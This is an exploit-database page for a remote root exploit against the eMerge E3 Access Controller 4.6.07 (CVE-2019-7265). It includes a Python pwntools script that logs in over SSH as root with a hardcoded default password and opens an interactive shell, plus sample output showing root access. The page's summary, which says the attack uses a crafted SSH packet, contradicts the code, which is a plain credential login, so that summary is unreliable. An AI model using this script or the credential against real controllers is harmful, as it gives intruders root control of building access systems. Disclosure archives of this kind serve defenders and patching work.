header-logo
Suggest Exploit
vendor:
eMerge E3 Access Controller
by:
LiquidWorm
9.8
CVSS
CRITICAL
Remote Code Execution
78
CWE
Product Name: eMerge E3 Access Controller
Affected Version From: 4.6.07
Affected Version To: 4.6.07
Patch Exists: YES
Related CWE: CVE-2019-7265
CPE: a:linear_solutions:e3_access_controller:4.6.07
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: NA
2018

eMerge E3 Access Controller 4.6.07 – Remote Code Execution

A vulnerability in the eMerge E3 Access Controller 4.6.07 allows an attacker to gain root access to the system by exploiting a vulnerability in the SSH protocol. The vulnerability can be exploited by sending a specially crafted SSH packet to the target system. Once the packet is received, the attacker can gain root access to the system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
Source

Exploit-DB raw data:

# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

#!/usr/bin/env python
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] root@192.168.1.2:
#     Distro    Unknown Unknown
#     OS:       Unknown
#     Arch:     Unknown
#     Version:  0.0.0
#     ASLR:     Disabled
#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov  1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====

from pwn import *

if len(sys.argv) < 2:
    print 'Usage: ./e3.py <ip>\n'
    sys.exit()

ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()

Navigation

Suggest Exploit

Services By CQR